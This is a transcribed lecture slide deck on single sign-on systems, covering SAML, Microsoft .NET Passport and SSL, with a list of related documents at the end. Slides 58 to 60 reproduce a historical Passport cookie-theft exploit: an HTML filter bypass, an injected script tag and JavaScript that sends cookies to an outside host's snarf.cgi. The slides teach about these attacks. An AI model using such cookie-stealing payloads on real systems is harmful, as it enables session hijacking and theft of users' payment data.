Single Sign-on Systems SS5
|
|
- Cori Thornton
- 8 years ago
- Views:
Transcription
1 Single Sign-on Systems SS5
2 Scenario Going to travel Sign in for booking flight ticket Sign in for booking hotel room Sign in for renting a car
3 Multi sign on is troublesome Is it possible to just sign-on once to perform all the actions? Single sign-on can be used to answer that question.
4 Introduction What is single sign-on How does it works Two single sign-on systems: SAML Microsoft passport Attack to the Microsoft passport Advantage and disadvantage of single sign-on
5 Definitions of Single Sign-On (SSO) on the Web: Users sign onto a site only once and are given access to one or more applications in a single domain or across multiple domains. [1] A mechanism to verify a user across multiple applications through a single authentication challenge. WebSphere Portal Server uses Java Authentication and Authorization Services to achieve single sign-on. [2] One log-on provides access to all resources of the network, LAN, or WAN. [3]
6 It can be illustrated in two different scopes. One is in the client/server relationship, the other is in the e-commerce domain.
7 In Client / Server relationship In any client/server relationship, single sign-on is a session/user authentication process that permits a user to enter one name and password in order to access multiple applications. [4]
8 In E-commerce In e-commerce, the single sign-on (sometimes referred to as SSO) is designed to centralize consumer financial information on one server- not only for the consumer's convenience, but also to offer increased security by limiting the number of times the consumer enters credit card numbers or other sensitive information used in billing. [5]
9 How does it work?
10 Password synchronization The password synchronization is the process of changing each password for different applications to the same value, so that the user always enters the same password. Once you install password synchronization software, users will enter the same password when they login to any of the synchronized systems, such as to their network, finance system, , calendar or the mainframe.
11 Password synchronization VS Single sign-on Password Synchronization Single Sign-on Process Login times Simply changes all applications to the same password. User continues to login to each of those applications separately, but uses same password. Several times depends on the application required Use single username and password to sign in to one site, the client authentication of other site done by specific server Once for every domain
12 Password synchronization VS Single sing-on (con) Manage credential data Weak password Security Manage passwords only, Can only match the policy of the weakest system Once one application is compromised, all the other applications can be accessed, the sensitive data will be obtained. Use specific protocol to manage the client authentication and the secrete information Only one password, can make very secure Can encrypt to the sensitive data and send it by the SSL save channel
13 SAML What is SAML? SAML (Security Assertion Markup Language) an XML framework for exchanging security information over the Internet.
14 How it works 1.The service provider received the client request, and it sent the request to Identity provider to do the client authentication. 2.Identity provider authenticate the client, create the assertion, and pass it back to the service provider. SAML assertions can be add a SOAP Header blocks, and pass by the HTTP protocol
15 Request from the Service provider Here, a sample SAML-compliant request is sent from a service provider requesting password authentication by the identity provider. <samlp: Request...> <samlp: AttributeQuery> <saml: Subject> <saml: NameIdentifier SecurityDomain="sun. com" Name="rimap"/> </ saml: Subject> <saml: AttributeDesignator AttributeName="Employee_ ID" AttributeNamespace="sun. com"> </ saml: AttributeDesignator> </ samlp: AttributeQuery> </ samlp: Request>
16 Response from the Identity provider In response, the issuing authority asserts that the subject (S) was authenticated by means (M) at time (T). <samlp: Response MajorVersion="1" MinorVersion="0" RequestID=" " InResponseTo=" " StatusCode="/features/2002/05/Success"> <saml: Assertion MajorVersion="1" MinorVersion="0" AssertionID=" " Issuer="Sun Microsystems, Inc." IssueInstant=" T10: 00: 23Z"> <saml: Conditions NotBefore=" T10: 00: 30Z" NotAfter=" T10: 15: 00Z" /> <saml: AuthenticationStatement AuthenticationMethod="Password" AuthenticationInstant=" T10: 00: 20Z"> <saml: Subject> <saml: NameIdentifier SecurityDomain="sun. com" Name="rimap" /> </ saml: Subject> </ saml: AuthenticationStatement> </ saml: Assertion> </ samlp: Response>
17 What is SAML composed of Assertions Request/response protocols Bindings (the SOAP-over-HTTP method of transporting SAML requests and responses) Profiles (for embedding and extracting SAML assertions in a framework or protocol)
18 .NET Passport
19 .NET Passport Microsoft.NET Passport - Passport single sign in service - Kids Passport service Passport supplies registered users an electronic ticket. With this ticket users are authorized to access pages in participating sites.
20 .NET Passport An implementation of Single Sign-On system, based on the cookie mechanism. Employing technique to prevent attacks - Captcha telling human from computers - Secure Sockets Layer (SSL)
21 .NET Passport Registration process - Information stored in passport account -Captcha - Validation Authentication process - Cookies written by passport - Navigate to another Participating Site - Secure Sockets Layer (SSL)
22 Passport service Three parts in the system
23 Registration process (1) 1 In this example the user browses to Site A and click the Sign In button 2 The user is redirected to a co-branded registration page displaying the registration fields that were chosen by Site A. 3 The user reads and accepts terms of use, and submits the registration form. 4 The user is then redirected back to Site A with their encrypted authentication ticket and profile information attached. 5 Site A decrypts the authentication ticket and profile information and continues their registration process, or grants access to their site. [5]
24 Registration process (2) Information Stored in a.net Passport - Credential stored only within the Passport service - Profile data stored within the Passport service and shared with participating sites based on user consent
25 Registration process (2)
26 Registration process (3) Captcha Human Interaction Protocol - telling human from computers by asking registers to type in alphanumeric characters from a picture - bots attackers submit thousands of fake registrations in short time
27 Registration process (3) CAPTCHA stands for Completely Automated Public Turing Test to Tell Computers and Humans Apart. [6] CAPTCHA test is a program that can generate and grade tests that: - Most humans can pass. - Current computer programs can't pass. For example, humans can read distorted text as the one shown below but current computer programs can't:
28 Registration process (4) Validation - service sends a welcome message to verify registration - efficiently prevent addresses confusion Unique Identifiers When registering successfully, each account is assigned a 64-bit Passport User ID (PUID).
29 Authentication Process (1) 1. User browses to participating site or service and clicks Sign In button or link. 2. User is redirected to Passport.net 3. Passport checks if the user has a Ticket Granting Cookie (TGT) in their browser s cookie file, if one is detected they skip to step 4 and never see the Passport login UI. If the TGT does not satisfy the time since sign in rule requested by Site A, then Passport redirects the user to a log on page. If the user enters the correct information, they proceed. 4. The user is redirected back to Site A with their encrypted authentication ticket and profile information attached. 5. Site A decrypts authentication ticket and profile information, and signs the customer into their site. 6. User accesses the page, resource, or service they requested from Site A. [7]
30 Authentication Process (2) Cookies written by Passport Passport writes a cookie, called ticket-granting-cookie, on the user s browser. This cookie can be used as electronic tickets in subsequent access. - Cookies with credentials are encrypted with Passport key - Cookies with profile information are encrypted with participating sites key
31 Authentication Process (3) Navigate to another Participating Site - without re-entering password - log current site in cookie
32 Authentication Process (4) Secure Sockets Layer (SSL) A security enhancing protocol providing data encryption, server authentication, and message integrity for a connection to the Internet - Using Public Key Cryptography for Authentication - Certificate mechanism
33 Secure Sockets Layer (SSL) Using Public Key Cryptography for Authentication Alice wants to authenticate Bob. Bob has a pair of keys, one public and one private. Bob discloses the public key to Alice (this is discussed in the "Handing Out Public Keys" ) Random msg Bob {Random msg} Bob s private key Alice
34 Secure Sockets Layer (SSL) Additional consideration Bob encrypted a unknown message??? Now Bob constructs a message digest and encrypts that message digest - The digest is difficult to reverse. - An impersonator has difficulty finding a different message that computes to the same digest value. Random msg Bob {digest [Random msg]} Bob s private key Alice
35 Secure Sockets Layer (SSL) Additional consideration(2) digital signature Originating Data for Authentication Alice -->Bob hello,are you bob? Bob-->Alice Alice,This Is bob{digest[alice,this Is Bob]}bobs-private-key
36 Secure Sockets Layer (SSL) Handing Out Public Keys certificate mechanism A certificate contains the following information: The name of the certificate issuer. The entity for whom the certificate is being issued (also known as the subject). The public key of the subject. Some time stamps. [8] The certificate is signed by using the private key of the certificate issuer.
37 Secure Sockets Layer (SSL) Certificates are a standard method to bind a public key to a name. A-->B hello B-->A Hi, I'm Bob, bobs-certificate A-->B prove it (Everyone knows the public key of the certificate issuer) B-->A Alice, This Is bob{ digest[alice, This Is Bob] } bobs-private-key Exchanging a Secret After A has authenticated B, A can send B a message that only B can decode as follows A->B {secret} Bob's_public_key secret is a key to a symmetric cryptographic algorithm After authentication, both A and B send message encrypted with the symmetric key.
38 Secure Sockets Layer (SSL) Potential attack! B-->M {some message}secret-key M-->A Garble[ {some message}secret-key ] msg1 msg1 Bob msg2 msg2 Alice Mallory
39 Secure Sockets Layer (SSL) Message Authentication Code (MAC) MAC := digest[ some_message, secret ] In.NET Passport, a 128-bit MAC is used. A-->B hello B-->A Hi, I'm Bob, bobs-certificate A-->B prove it B-->A {digest[alice, This Is Bob] } bobsprivate-key A-->B ok bob, here is a secret {secret} bobs-public-key B-->A {some message,mac}secret-key
40 MS Passport security weaknesses Cookies problem Key management Passport Server attack Hotmail credential assignment
41 Cookies problems Passport cookies contains sensitive data. On a public machine, a user who forgets to log out could leave valid authentication for any users to misuse. Persistent cookies choice. It is convenient, but risky. Cookies are more social than technological. It may compromise user privacy
42 Key management Generate and Transfer key These keys should be generated randomly and securely. These keys are transferred by an SSL connection. This is likely to lead to potential breaches. Single key to encrypt all the cookies MS Passport uses a single key to encrypt all the cookies and store the information in cookies on user s machines. So it could be a better way to use a master key to generate a unique key.
43 Passport Server Attack When you become a center point, you will become an attractive target for attack. Different from traditional authentication, Passport Server makes decisions about the authenticity of all users and stores all data of users, including users credit card numbers. It is extremely attractive!
44 Hotmail credential assignment When users log into hotmail, they actually run the passport protocol. Unfortunately, Hotmail has been fraught with security problems. The attacker can log into user s Hotmail account without knowing the password. Then the attacker may go to the online shops using user s wallet. For example: Emil Glosserman, Internet security expert, attacked the Microsoft Hotmail and Passport server systems twice.
45 Attack to the MS Passport Fake merchant attack Active attack DNS attack Cookie attack
46 Fake merchant attack Bob = Passport user Mallory = Attacker of Malicious party Assumption: Bob get accustomed to using passport and trust the security of the passport server.
47 How to attack? 1. Mallory sets up a phony web store to sell some attractive things. 2. Mallory gets a certificate for a web site, called pasport.com. And Mallory sets up his web site which is exactly the same as a real passport.com. 3. So Bob want to buy something in Mallory s shop, click sign-in, the server creates a redirect to Mallory s pasport.com. Bob is in the habit of filling his Address and Password. 4. After that, Mallory has got Bob s valid authentication information, and he can go to online shop, use Bob s wallet service on behalf of Bob.
48
49 Active attack Bob = Passport user Alice = trustful merchant Mallory = Attacker of Malicious party Assumption: Mallory has already accessed to network between Bob and Alice, Mallory could rewrite packets passing between Bob and Alice.
50 How to attack? 1. Bob want to buy something in Alice s shop, and sends a request to Alice. 2. Alice replies to Bob to use a login service at 3. Attacker Mallory, waiting between Bob and Alice, interrupts the packet that Alice sends to Bob, and rewrites the URL in the redirection to her fake pasport.com. 4. Bob visits Mallory s fake pasport web site, filling with the login information. He has not noticed that! 5. Now, Mallory has succeeded to attack the system. Mallory acts as a proxy between Bob and Alice, and between Bob and Passport Server.
51
52 Why Mallory succeed? Bob personal reason The redirection from Alice to Bob is not protected by SSL protocol. Passport s use of SSL connections cannot prevent the Mallory from reading and rewriting each packet, as all SSL connections are terminated on the proxy.
53 DNS Attack The security of Passport is heavily decided by the Domain Name System. So the attacker Mallory who controls Bob s DNS service could simply rewrite passport.com to the IP address of Mallory s fake pasport.com. And it will get the same result as above.
54 Cookie Attacks A variety of cookies are set in the passport.com domain, when you login to your Passport account
55 Two most important cookies: 1. MSPSec cookie : authenticates you to Passport to implement the single sign on feature 2. MSPAuth cookie: identifies you to the server via the 64-bit Passport Unique ID (PUID) associated with your account
56 The Implementation: Passport Wallet A fairly simple application implemented on top of Passport that stores your credit card and contact information
57 Stole it!! Passport Wallet doesn't provide as much security as it may appear at first glance. There are three general areas of concern. 1. User may have entered their password, but not intending to be used to access their Passport Wallet. 2. A "manual sign in" doesn't actually require that the user enter their password in some cases. MSN Messenger 3. Cross Site Scripting Bugs
58 Examples: Step: 1. Hotmail HTML Filtering Hole From: Jennifer Sparks To: Subject: Jack said I should you... Hi Ted. Jack said we would really hit it off. Maybe we can get together for drinks sometime. May be this Friday? Let me know. You can see the below for demonstration purposes. In a real exploit, you wouldn't even see it happening. <_img foo="<iframe width='80%' height='400' src='http: //alive.znep.com/~marcs/passport/grabit.htm l'></iframe>" >
59 Step 2. Setup a couple of Frames <FRAME NAME="me1" SRC=" please"> Allows us to steal the MSPSec cookie. <FRAME NAME="me2" SRC=" ttps://ww.passport.com/%22%3e%3cscript%20src='h ttp://alive.znep.com/~marcs/passport/snarf.js'% 3Ej%3C/SCRIPT%3E%3Flc%3D1033"> Exploits one of the passport.com cross site scripting if you are logged in.
60 Step 3: Stealing the Cookies The contents of Jennifer Sparks are quite simple: s = new String (document URL); If (s.indexof(' == 0) { settimeout('document.location=" + s.substring(5, s.length-1, 1000)'); } else { document.location=" /passport/snarf.cgi?cookies=" + escape(parent.frames[0].document.cookie); }
61 Step 4: So we have the cookies... FINISHED!!!!
62 Advantages: Although as we all see, the passport has so many risks, why do we still like to use it?
63 Make things simple!! Ease of use. Password limited to local machine. Simplified Management.
64 Business use (MS Passport) Single sign-in. Kids Passport.
65 Business Benefits of Passport Save Time and Money Required to Build Authentication Systems Offer 200 Million Passport Users Easy Access to Your Site Increase Customer Loyalty with Easy, Dependable Personalization Maintain Your Branding with Flexible Customization Maintain Ownership and Control of Your Customer Data
66 Liberty Alliance The Liberty Alliance Project is an alliance of more than 150 companies, non-profit and government organizations from around the globe. Liberty Alliance and Passport are both primarily targeted at consumers and it will be a while before there will be significant web services use by consumers.
67 The Liberty Alliance is pushing forward with its vision for an open-system single sign-on, which officials have described as a federated-view solution. The Alliance plans to have personal information controlled completely by the user
68 Liberty version 1.0 Concludes: Web Redirection, Web Services, Metadata and Schemas Theoretically, the organizations in Alliance could extend boundless. it will bring the problems about the flexibility of the system and the management of the certification.
69 Conclusion Single Sign-On enables users to login quickly and securely to all their applications, websites and mainframe sessions with just one identity. We look forward to the cooperation and competition between Liberty Alliance and Microsoft may promote the progress of single Sign in System.
70 References [1] [2] www- 3.ibm.com/software/webservers/portal/library/v12/InfoCenter/wps/glossary.ht ml [3] [4] [5] [6] Microsoft.Net Passport Review Guide [Jan.2004] [7] Telling Humans and Computers Apart Automatically L u i s v o n A h n Feb [8] XADM: How Secure Sockets Layer Works Microsoft.com Nov. 2004
Microsoft.NET Passport, a solution of single sign on
Microsoft.NET Passport, a solution of single sign on Zheng Liu Department of Computer Science University of Auckland zliu025@ec.auckland.ac.nz Abstract: As the World Wide Web grows rapidly, accessing web-based
More informationIdentity Management im Liberty Alliance Project
Rheinisch-Westfälische Technische Hochschule Aachen Lehrstuhl für Informatik IV Prof. Dr. rer. nat. Otto Spaniol Identity Management im Liberty Alliance Project Seminar: Datenkommunikation und verteilte
More informationTenrox. Single Sign-On (SSO) Setup Guide. January, 2012. 2012 Tenrox. All rights reserved.
Tenrox Single Sign-On (SSO) Setup Guide January, 2012 2012 Tenrox. All rights reserved. About this Guide This guide provides a high-level technical overview of the Tenrox Single Sign-On (SSO) architecture,
More informationLiberty Alliance. CSRF Review. .NET Passport Review. Kerberos Review. CPSC 328 Spring 2009
CSRF Review Liberty Alliance CPSC 328 Spring 2009 Quite similar, yet different from XSS Malicious script or link involved Exploits trust XSS - exploit user s trust in the site CSRF - exploit site s trust
More informationStep-by-Step guide for SSO from MS Sharepoint 2010 to SAP EP 7.0x
Step-by-Step guide for SSO from MS Sharepoint 2010 to SAP EP 7.0x Sverview Trust between SharePoint 2010 and ADFS 2.0 Use article Federated Collaboration with Shibboleth 2.0 and SharePoint 2010 Technologies
More informationImplementing Single Sign On in Java Technologybased
Implementing Single Sign On in Java Technologybased Web Services Rima Patel Sriganesh Technology Evangelist Sun Microsystems, Inc. Why Am I Here? Well Because I Hate to sign-on tens of times for using
More informationComputer Systems Security 2013/2014. Single Sign-On. Bruno Maia ei09095@fe.up.pt. Pedro Borges ei09063@fe.up.pt
Computer Systems Security 2013/2014 Single Sign-On Bruno Maia ei09095@fe.up.pt Pedro Borges ei09063@fe.up.pt December 13, 2013 Contents 1 Introduction 2 2 Explanation of SSO systems 2 2.1 OpenID.................................
More informationRisks of the Passport Single Signon Protocol
Risks of the Passport Single Signon Protocol David Kormann and Aviel D. Rubin AT&T Labs - Research {davek,rubin}@research.att.com Abstract Passport is a protocol that enables users to sign onto many different
More informationGateway Apps - Security Summary SECURITY SUMMARY
Gateway Apps - Security Summary SECURITY SUMMARY 27/02/2015 Document Status Title Harmony Security summary Author(s) Yabing Li Version V1.0 Status draft Change Record Date Author Version Change reference
More informationWhy Identity Management. Identity Management. What We Cover. Role of Digital Identity. Digital Identity. Digital Identity (or network identity)
Why Identity Management Identity Management Claudiu Duma Identity crisis Privacy concerns Identity theft Terrorist threat Department of Computer and Information Science cladu@ida.liu.se What We Cover Digital
More informationLecture 9: Application of Cryptography
Lecture topics Cryptography basics Using SSL to secure communication links in J2EE programs Programmatic use of cryptography in Java Cryptography basics Encryption Transformation of data into a form that
More informationNew Single Sign-on Options for IBM Lotus Notes & Domino. 2012 IBM Corporation
New Single Sign-on Options for IBM Lotus Notes & Domino 2012 IBM Corporation IBM s statements regarding its plans, directions, and intent are subject to change or withdrawal without notice at IBM s sole
More informationClient Server Registration Protocol
Client Server Registration Protocol The Client-Server protocol involves these following steps: 1. Login 2. Discovery phase User (Alice or Bob) has K s Server (S) has hash[pw A ].The passwords hashes are
More informationSAML Security Analysis. Huang Zheng Xiong Jiaxi Ren Sijun
SAML Security Analysis Huang Zheng Xiong Jiaxi Ren Sijun outline The intorduction of SAML SAML use case The manner of SAML working Security risks on SAML Security policy on SAML Summary my course report
More informationNetwork Security Protocols
Network Security Protocols EE657 Parallel Processing Fall 2000 Peachawat Peachavanish Level of Implementation Internet Layer Security Ex. IP Security Protocol (IPSEC) Host-to-Host Basis, No Packets Discrimination
More informationCA Nimsoft Service Desk
CA Nimsoft Service Desk Single Sign-On Configuration Guide 6.2.6 This Documentation, which includes embedded help systems and electronically distributed materials, (hereinafter referred to as the Documentation
More informationSAML-Based SSO Solution
About SAML SSO Solution, page 1 SAML-Based SSO Features, page 2 Basic Elements of a SAML SSO Solution, page 2 SAML SSO Web Browsers, page 3 Cisco Unified Communications Applications that Support SAML SSO,
More informationCS 356 Lecture 28 Internet Authentication. Spring 2013
CS 356 Lecture 28 Internet Authentication Spring 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control Lists
More informationThis chapter describes how to use the Junos Pulse Secure Access Service in a SAML single sign-on deployment. It includes the following sections:
CHAPTER 1 SAML Single Sign-On This chapter describes how to use the Junos Pulse Secure Access Service in a SAML single sign-on deployment. It includes the following sections: Junos Pulse Secure Access
More informationSingle Sign-On Implementation Guide
Salesforce.com: Salesforce Winter '09 Single Sign-On Implementation Guide Copyright 2000-2008 salesforce.com, inc. All rights reserved. Salesforce.com and the no software logo are registered trademarks,
More informationCA Performance Center
CA Performance Center Single Sign-On User Guide 2.4 This Documentation, which includes embedded help systems and electronically distributed materials, (hereinafter referred to as the Documentation ) is
More informationConfiguring Salesforce
Chapter 94 Configuring Salesforce The following is an overview of how to configure the Salesforce.com application for singlesign on: 1 Prepare Salesforce for single sign-on: This involves the following:
More informationThe following multiple-choice post-course assessment will evaluate your knowledge of the skills and concepts taught in Internet Business Associate.
Course Assessment Answers-1 Course Assessment The following multiple-choice post-course assessment will evaluate your knowledge of the skills and concepts taught in Internet Business Associate. 1. A person
More informationRisks of the Passport Single Signon Protocol
Appeared in IEEE Computer Networks, (July, 2000) Risks of the Passport Single Signon Protocol David P. Kormann and Aviel D. Rubin AT&T Labs - Research 180 Park Avenue Florham Park, NJ 07932 {davek,rubin}@research.att.com
More informationSingle Sign-On Implementation Guide
Version 27.0: Spring 13 Single Sign-On Implementation Guide Last updated: February 1, 2013 Copyright 2000 2013 salesforce.com, inc. All rights reserved. Salesforce.com is a registered trademark of salesforce.com,
More informationSetup Guide Access Manager Appliance 3.2 SP3
Setup Guide Access Manager Appliance 3.2 SP3 August 2014 www.netiq.com/documentation Legal Notice THIS DOCUMENT AND THE SOFTWARE DESCRIBED IN THIS DOCUMENT ARE FURNISHED UNDER AND ARE SUBJECT TO THE TERMS
More informationSSL/TLS: The Ugly Truth
SSL/TLS: The Ugly Truth Examining the flaws in SSL/TLS protocols, and the use of certificate authorities. Adrian Hayter CNS Hut 3 Team adrian.hayter@cnsuk.co.uk Contents Introduction to SSL/TLS Cryptography
More informationFor details about using automatic user provisioning with Salesforce, see Configuring user provisioning for Salesforce.
Chapter 41 Configuring Salesforce The following is an overview of how to configure the Salesforce.com application for singlesign on: 1 Prepare Salesforce for single sign-on: This involves the following:
More informationDIGIPASS Authentication for Microsoft ISA 2006 Single Sign-On for Outlook Web Access
DIGIPASS Authentication for Microsoft ISA 2006 Single Sign-On for Outlook Web Access With IDENTIKEY Server / Axsguard IDENTIFIER Integration Guidelines Disclaimer Disclaimer of Warranties and Limitations
More informationSTUDY ON IMPROVING WEB SECURITY USING SAML TOKEN
STUDY ON IMPROVING WEB SECURITY USING SAML TOKEN 1 Venkadesh.M M.tech, Dr.A.Chandra Sekar M.E., Ph.d MISTE 2 1 ResearchScholar, Bharath University, Chennai 73, India. venkadeshkumaresan@yahoo.co.in 2 Professor-CSC
More informationOkta/Dropbox Active Directory Integration Guide
Okta/Dropbox Active Directory Integration Guide Okta Inc. 301 Brannan Street, 3rd Floor San Francisco CA, 94107 info@okta.com 1-888- 722-7871 1 Table of Contents 1 Okta Directory Integration Edition for
More informationSAML-Based SSO Solution
About SAML SSO Solution, page 1 SAML-Based SSO Features, page 2 Basic Elements of a SAML SSO Solution, page 2 SAML SSO Web Browsers, page 3 Cisco Unified Communications Applications that Support SAML SSO,
More informationSingle Sign-On for the Internet: A Security Story. Eugene Tsyrklevich eugene@tsyrklevich.name Vlad Tsyrklevich vlad902@gmail.com
Single Sign-On for the Internet: A Security Story Eugene Tsyrklevich eugene@tsyrklevich.name Vlad Tsyrklevich vlad902@gmail.com BlackHat USA, Las Vegas 2007 Introduction With the explosion of Web 2.0 technology,
More informationWeb Payment Security. A discussion of methods providing secure communication on the Internet. Zhao Huang Shahid Kahn
Web Payment Security A discussion of methods providing secure communication on the Internet Group Members: Peter Heighton Zhao Huang Shahid Kahn 1. Introduction Within this report the methods taken to
More informationA Data Synchronization based Single Sign-on Schema Supporting Heterogeneous Systems and Multi-Management Mode
A Data Synchronization based Single Sign-on Schema Supporting Heterogeneous Systems and Multi-Management Mode Haojiang Gao 1 Beijing Northking Technology Co.,Ltd Zhongguancun Haidian Science Park Postdoctoral
More informationLukasz Pater CMMS Administrator and Developer
Lukasz Pater CMMS Administrator and Developer EDMS 1373428 Agenda Introduction Why do we need asymmetric ciphers? One-way functions RSA Cipher Message Integrity Examples Secure Socket Layer Single Sign
More informationSAML Authentication Quick Start Guide
SAML Authentication Quick Start Guide Powerful Authentication Management for Service Providers and Enterprises Authentication Service Delivery Made EASY Copyright 2013 SafeNet, Inc. All rights reserved.
More informationADFS Integration Guidelines
ADFS Integration Guidelines Version 1.6 updated March 13 th 2014 Table of contents About This Guide 3 Requirements 3 Part 1 Configure Marcombox in the ADFS Environment 4 Part 2 Add Relying Party in ADFS
More informationHow-to: Single Sign-On
How-to: Single Sign-On Document version: 1.02 nirva systems info@nirva-systems.com nirva-systems.com How-to: Single Sign-On - page 2 This document describes how to use the Single Sign-On (SSO) features
More informationChapter 8 Security. IC322 Fall 2014. Computer Networking: A Top Down Approach. 6 th edition Jim Kurose, Keith Ross Addison-Wesley March 2012
Chapter 8 Security IC322 Fall 2014 Computer Networking: A Top Down Approach 6 th edition Jim Kurose, Keith Ross Addison-Wesley March 2012 All material copyright 1996-2012 J.F Kurose and K.W. Ross, All
More informationRemotelyAnywhere Getting Started Guide
April 2007 About RemotelyAnywhere... 2 About RemotelyAnywhere... 2 About this Guide... 2 Installation of RemotelyAnywhere... 2 Software Activation...3 Accessing RemotelyAnywhere... 4 About Dynamic IP Addresses...
More informationPROVIDING SINGLE SIGN-ON TO AMAZON EC2 APPLICATIONS FROM AN ON-PREMISES WINDOWS DOMAIN
PROVIDING SINGLE SIGN-ON TO AMAZON EC2 APPLICATIONS FROM AN ON-PREMISES WINDOWS DOMAIN CONNECTING TO THE CLOUD DAVID CHAPPELL DECEMBER 2009 SPONSORED BY AMAZON AND MICROSOFT CORPORATION CONTENTS The Challenge:
More informationSAML basics A technical introduction to the Security Assertion Markup Language
SAML basics A technical introduction to the Security Assertion Markup Language WWW2002 Eve Maler, XML Standards Architect XML Technology Center Sun Microsystems, Inc. Agenda The problem space SAML concepts
More informationMicrosoft.NET Passport Integration with Active Directory in IIS 6.0 and Windows.NET Enterprise Server and Windows XP Professional as a Client
Microsoft.NET Passport Integration with Active Directory in IIS 6.0 and Windows.NET Enterprise Server and Windows XP Professional as a Client Written by Marc Grote MCP, MCP+I, MCSA, MCSE NT4, MCSE Win2K,
More informationSingle Sign-On Implementation Guide
Single Sign-On Implementation Guide Salesforce, Winter 16 @salesforcedocs Last updated: November 4, 2015 Copyright 2000 2015 salesforce.com, inc. All rights reserved. Salesforce is a registered trademark
More informationGENERAL OVERVIEW OF VARIOUS SSO SYSTEMS: ACTIVE DIRECTORY, GOOGLE & FACEBOOK
Antti Pyykkö, Mikko Malinen, Oskari Miettinen GENERAL OVERVIEW OF VARIOUS SSO SYSTEMS: ACTIVE DIRECTORY, GOOGLE & FACEBOOK TJTSE54 Assignment 29.4.2008 Jyväskylä University Department of Computer Science
More informationSetup Guide Access Manager 3.2 SP3
Setup Guide Access Manager 3.2 SP3 August 2014 www.netiq.com/documentation Legal Notice THIS DOCUMENT AND THE SOFTWARE DESCRIBED IN THIS DOCUMENT ARE FURNISHED UNDER AND ARE SUBJECT TO THE TERMS OF A LICENSE
More informationConfiguring SonicWALL TSA on Citrix and Terminal Services Servers
Configuring on Citrix and Terminal Services Servers Document Scope This solutions document describes how to install, configure, and use the SonicWALL Terminal Services Agent (TSA) on a multi-user server,
More informationSingle Sign-On Implementation Guide
Single Sign-On Implementation Guide Salesforce, Summer 15 @salesforcedocs Last updated: July 1, 2015 Copyright 2000 2015 salesforce.com, inc. All rights reserved. Salesforce is a registered trademark of
More informationUsing etoken for SSL Web Authentication. SSL V3.0 Overview
Using etoken for SSL Web Authentication Lesson 12 April 2004 etoken Certification Course SSL V3.0 Overview Secure Sockets Layer protocol, version 3.0 Provides communication privacy over the internet. Prevents
More informationSecurity Assertion Markup Language (SAML) Site Manager Setup
Security Assertion Markup Language (SAML) Site Manager Setup Trademark Notice Blackboard, the Blackboard logos, and the unique trade dress of Blackboard are the trademarks, service marks, trade dress and
More informationJVA-122. Secure Java Web Development
JVA-122. Secure Java Web Development Version 7.0 This comprehensive course shows experienced developers of Java EE applications how to secure those applications and to apply best practices with regard
More informationWeb Security. Mahalingam Ramkumar
Web Security Mahalingam Ramkumar Issues Phishing Spreading misinformation Cookies! Authentication Domain name DNS Security Transport layer security Dynamic HTML Java applets, ActiveX, JavaScript Exploiting
More informationHosted Microsoft Exchange Client Setup & Guide Book
Hosted Microsoft Exchange Client Setup & Guide Book Section 1 Microsoft Outlook Web Access (OWA) access directions Section 2 Windows Mobile Phone ActiveSync setup & configuration Section 3 - Apple iphone
More informationImplementation Guide SAP NetWeaver Identity Management Identity Provider
Implementation Guide SAP NetWeaver Identity Management Identity Provider Target Audience Technology Consultants System Administrators PUBLIC Document version: 1.10 2011-07-18 Document History CAUTION Before
More informationArchitecture of Enterprise Applications III Single Sign-On
Architecture of Enterprise Applications III Single Sign-On Haopeng Chen REliable, INtelligent and Scalable Systems Group (REINS) Shanghai Jiao Tong University Shanghai, China e-mail: chen-hp@sjtu.edu.cn
More informationLeverage Active Directory with Kerberos to Eliminate HTTP Password
Leverage Active Directory with Kerberos to Eliminate HTTP Password PistolStar, Inc. PO Box 1226 Amherst, NH 03031 USA Phone: 603.547.1200 Fax: 603.546.2309 E-mail: salesteam@pistolstar.com Website: www.pistolstar.com
More informationAuthentication Methods
Authentication Methods Overview In addition to the OU Campus-managed authentication system, OU Campus supports LDAP, CAS, and Shibboleth authentication methods. LDAP users can be configured through the
More informationAdministrator Guide. v 11
Administrator Guide JustSSO is a Single Sign On (SSO) solution specially developed to integrate Google Apps suite to your Directory Service. Product developed by Just Digital v 11 Index Overview... 3 Main
More informationFairsail. Implementer. Single Sign-On with Fairsail and Microsoft Active Directory Federation Services 2.0. Version 1.92 FS-SSO-XXX-IG-201406--R001.
Fairsail Implementer Microsoft Active Directory Federation Services 2.0 Version 1.92 FS-SSO-XXX-IG-201406--R001.92 Fairsail 2014. All rights reserved. This document contains information proprietary to
More informationIs your data safe out there? -A white Paper on Online Security
Is your data safe out there? -A white Paper on Online Security Introduction: People should be concerned of sending critical data over the internet, because the internet is a whole new world that connects
More informationAccess Gateway Guide Access Manager 4.0 SP1
Access Gateway Guide Access Manager 4.0 SP1 May 2014 www.netiq.com/documentation Legal Notice THIS DOCUMENT AND THE SOFTWARE DESCRIBED IN THIS DOCUMENT ARE FURNISHED UNDER AND ARE SUBJECT TO THE TERMS
More informationEnhancing Web Application Security
Enhancing Web Application Security Using Another Authentication Factor Karen Lu and Asad Ali Gemalto, Inc. Technology & Innovations Austin, TX, USA Overview Introduction Current Statet Smart Cards Two-Factor
More informationLecture Notes for Advanced Web Security 2015
Lecture Notes for Advanced Web Security 2015 Part 6 Web Based Single Sign-On and Access Control Martin Hell 1 Introduction Letting users use information from one website on another website can in many
More informationINTEGRATION GUIDE. DIGIPASS Authentication for Salesforce using IDENTIKEY Federation Server
INTEGRATION GUIDE DIGIPASS Authentication for Salesforce using IDENTIKEY Federation Server Disclaimer Disclaimer of Warranties and Limitation of Liabilities All information contained in this document is
More informationSecuring your Online Data Transfer with SSL
Securing your Online Data Transfer with SSL A GUIDE TO UNDERSTANDING SSL CERTIFICATES, how they operate and their application 1. Overview 2. What is SSL? 3. How to tell if a Website is Secure 4. What does
More information2015-11-30. Web Based Single Sign-On and Access Control
0--0 Web Based Single Sign-On and Access Control Different username and password for each website Typically, passwords will be reused will be weak will be written down Many websites to attack when looking
More informationOpenSSO: Cross Domain Single Sign On
OpenSSO: Cross Domain Single Sign On Version 0.1 History of versions Version Date Author(s) Changes 0.1 11/30/2006 Dennis Seah Contents Initial Draft. 1 Introduction 1 2 Single Domain Single Sign-On 2
More informationCriteria for web application security check. Version 2015.1
Criteria for web application security check Version 2015.1 i Content Introduction... iii ISC- P- 001 ISC- P- 001.1 ISC- P- 001.2 ISC- P- 001.3 ISC- P- 001.4 ISC- P- 001.5 ISC- P- 001.6 ISC- P- 001.7 ISC-
More informationWeb Authentication Application Note
